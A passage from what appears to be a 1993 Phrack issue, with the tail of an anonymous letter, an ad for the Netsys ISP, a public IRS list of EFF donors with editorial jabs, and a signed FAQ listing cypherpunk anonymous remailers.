y0,Fidelio,2 scotts from Santafe,KL (He not have attitude  towards  this
mail,but I included him for polite since he reserved tickets for me  to
SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
hints to me, what this bug really exist (Yep, before I stoled report).

 - Write You later - anonymous.

P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
and sure Erik Bloodaxe. And also - IF after E911 incident you are more
carefully, feel free to replace "stole" to "got" (when you'll post it),  and
do not forget to add "reprinted with permission".

 - Sincerely, anonymous.

----------------------------------------------------------------------

[Editor:  More indications that we will all be raided by the DEA
          more often than the FBI in coming years.]

*****************************************************************************


 "Since my probation status forces me to be adamant about this. Illegal
  activities on Netsys cannot and will not be tolerated. Prison sucked."

                                    - Len Rose

 06/6/93

 NETSYS COMMUNICATION SERVICES  Palo Alto, California

 Netsys is a network of large Sun servers dedicated to providing
 Internet access to individuals and corporations that need solid,
 reliable Internet connectivity.  Netsys is at the hub of major
 Internet connectivity.

 Netsys is a system for professionals in both the Internet and Unix
 community. The public image is important to us. Illegal activities
 cannot be tolerated.

 Netsys has every feature you could possibly need.

 Netsys is lightly loaded, extremely reliable and dedicated to providing
 full time 24 hour Internet access.

 Support: 24 hour emergency response service.

 Dialups: Palo Alto area, High Speed (V.32 and PEP)

 Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)

                   $1 per megabyte per month over 5 megabytes.

 Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
                      $1 per megabyte per month over 10 megabytes.

 Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
            newsgroups, and including all foreign newsgroups.

               SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE

 Satellite Weather: Netsys has available real time satellite weather
                    imagery. Images are available in gif, or Sun raster
                    format. Contact us for NFS mirroring, and other special
                    arrangement. These images are directly downlinked from
                    the GOES bird. Contact Steve Eigsti (steve@netsys.com)

 Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service

                   for large volume news distribution. Members of Netsys
                   can obtain substantial discounts for the purchase and
                   service costs of this revolutionary method of Usenet news
                   distribution.  Both Unix and MS Windows software available.
                   Contact (pagesat@pagesat.com) for product information.

 Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
                  Members of Netsys can obtain critical email to pager
                  services. Pagesat has the ability to gateway any critical
                  electronic mail to your display pager.

                      Leased Line Internet Connections

  Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
  United States. Since Pagesat is an FCC common carrier, our savings on
  leased lines can be passed on to you. For further information, contact
  Duane Dubay (djd@pagesat.com).

 We offer other services such as creating domains, acting as MX
 forwarders, and of course uucp based newsfeeds.

 Netsys is now offering completely open shell access to Internet users.
 For accounts, or more information , send mail to netsys@netsys.com

 Netsys will NEVER accept more members than our capacity to serve.

 Netsys prides itself on it's excellent connectivity (including multiple T1's,
 and SMDS), lightly loaded systems, and it's clientele.

 We're not your average Internet Service Provider. And it shows.
--------------------------------------------------------------------
[Editor:  We here at Phrack are forever in debt to Mr. Len Rose for
          allowing us to use ftp.netsys.com as our new official FTP
          site after getting the boot off EFF.  It takes a steel
          set of huevos to let such an evil hacker publication
          reside on your hard drive after serving time for having
          dealings with evil hackers.  We are STOKED!  Thanks Len!
          Netsys is not your average site, INDEED!]

****************************************************************************

Something Phrack might like to see:

The contributors to and practices of the Electronic Frontier Foundation
disclose quite accurately, just who this organization represents.  We
challenge the legitimacy of the claim that this is a "public interest"
advocate.  Here is a copy of their list of contributors:

[FINS requested the Office of the Attorney General of the Commonwealth of
Massachusetts to provide us with a list of contributors of over $5000, to
the Electronic Frontier Foundation, required by IRS Form 990.  Timothy E.
Dowd, of the Division of Public Charities, provided us with a list (dated
January 21, 1993), containing the following information.  No response was
given to a phone request by FINS directly to EFF, for permission to inspect
and copy the most current IRS Form 990 information.]



                  ELECTRONIC FRONTIER FOUNDATION, INC.
              IRS FORM 990. PART I - LIST OF CONTRIBUTIONS


NAME AND ADDRESS OF CONTRIBUTOR       CONTRIBUTION
                                    DATE      AMOUNT

Kapor Family Foundation
C/O Kapor Enterprises, Inc.
155 2nd Street
Cambridge, MA 02141                Var       100,000

Mitchell D. Kapor
450 Warren Street
Brookline, MA 02146                Var       324,000

Andrew Hertzfeld
370 Channing Avenue
Palo Alto, CA 94301                12/12/91    5,000


Dunn & Bradstreet
C/O Michael F. ...
1001 G Street, NW Suite 300 East
Washington, DC 20001               02/12/92   10,000

National Cable Television
1724 Massachusetts Avenue, NW
Washington, DC 20036               02/18/92   25,000


MCI Communications Corporation
1133 19th Street, NW
Washington, DC 20036               03/11/92   15,000

American Newspaper Publishers
Association
The Newspaper CTR
11600 Sunrise Valley
Reston, VA 22091                   03/23/92   20,000

Apple Computer
20525 Mariani Avenue MS:75-61
Cupertino, CA 95014                03/23/92   50,000

Sun Microsystems, Inc
c/o Wayne Rosing
2550 Garcia Ave
Mountain View, CA 94043-1100       04/03/92   50,000

Adobe Systems, Inc.
c/o William Spaller
1585 Charlestown Road
Mountain View, CA 94039-7900       04/16/92   10,000

International Business Systems
c/o Robert Carbert, Rte 100
Somers, NY 10589                   05/07/92   50,000

Prodigy Services Company
c/o G. Pera...
445 Hamilton Avenue
White Plains, NY 10601             05/07/92   10,000

Electronic Mail Associates
1555 Wilson Blvd. Suite 300
Arlington, VA 22209                05/13/92   10,000

Microsoft
c/o William H. Neukom
1 Microsoft Way
Redmond, VA 98052                  06/25/92   50,000

David Winer
933 Hermosa Way
Menio Park, CA 94025               01/02/92    5,000

Ed Venture Holdings
c/o Ester Dvson
375 Park Avenue
New York, NY 10152                 03/23/92   15,000

Anonymous                          12/26/91   10,000

Bauman Fund
c/o Patricia Bauman
1731 Connecticut Avenue
Washington, DC 20009-1146          04/16/92    2,500

Capital Cities ABA
c/o Mark MacCarthy
2445 N. Street, NW Suite 48
Washington, DC 20037               05/04/92    1,000

John Gilmore
210 Clayton Street
San Francisco, CA 94117            07/23/91    1,488
                                   08/06/91  100,000

Government Technology              10/08/91    1,000

Miscellaneous                      04/03/91      120

Apple Writers Grant
c/o Apple Computer
20525 Mariani Avenue               01/10/92    15,000


[Editor:  Well, hmmm.  Tell you guys what:  Send Phrack that
          much money and we will give up our ideals and move to
          a new location, and forget everything about what we
          were all about in the beginning.  In fact, we will turn
          our backs on it.  Fair?

          I was talking about me moving to Europe and giving
          up computers.  Don't read anything else into that.  Nope.]

****************************************************************************

-----BEGIN PGP SIGNED MESSAGE-----

Q1: What cypherpunk remailers exist?

A1:

 1: hh@pmantis.berkeley.edu
 2: hh@cicada.berkeley.edu
 3: hh@soda.berkeley.edu
 4: nowhere@bsu-cs.bsu.edu
 5: remail@tamsun.tamu.edu
 6: remail@tamaix.tamu.edu
 7: ebrandt@jarthur.claremont.edu
 8: hal@alumni.caltech.edu
 9: remailer@rebma.mn.org
10: elee7h5@rosebud.ee.uh.edu
11: phantom@mead.u.washington.edu
12: hfinney@shell.portal.com
13: remailer@utter.dis.org
14: 00x@uclink.berkeley.edu
15: remail@extropia.wimsey.com

NOTES:
#1-#6  remail only, no encryption of headers
#7-#12  support encrypted headers
#15  special - header and message must be encrypted together
#9,#13,#15 introduce larger than average delay (not direct connect)
#14  public key not yet released

#9,#13,#15      running on privately owned machines

======================================================================

Q2: What help is available?

A2:

Check out the pub/cypherpunks directory at soda.berkeley.edu
(128.32.149.19).  Instructions on how to use the remailers are in the
remailer directory, along with some unix scripts and dos batch files.

Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.

======================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.2

iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
Y6Zv0kk/7rs=
=simY
-----END PGP SIGNATURE-----

[Editor:  We suggest that everyone go ahead and get the info file from
          soda.berkeley.edu's ftp site.  While you are there,
          take a look around.  Lots of groovy free stuff.]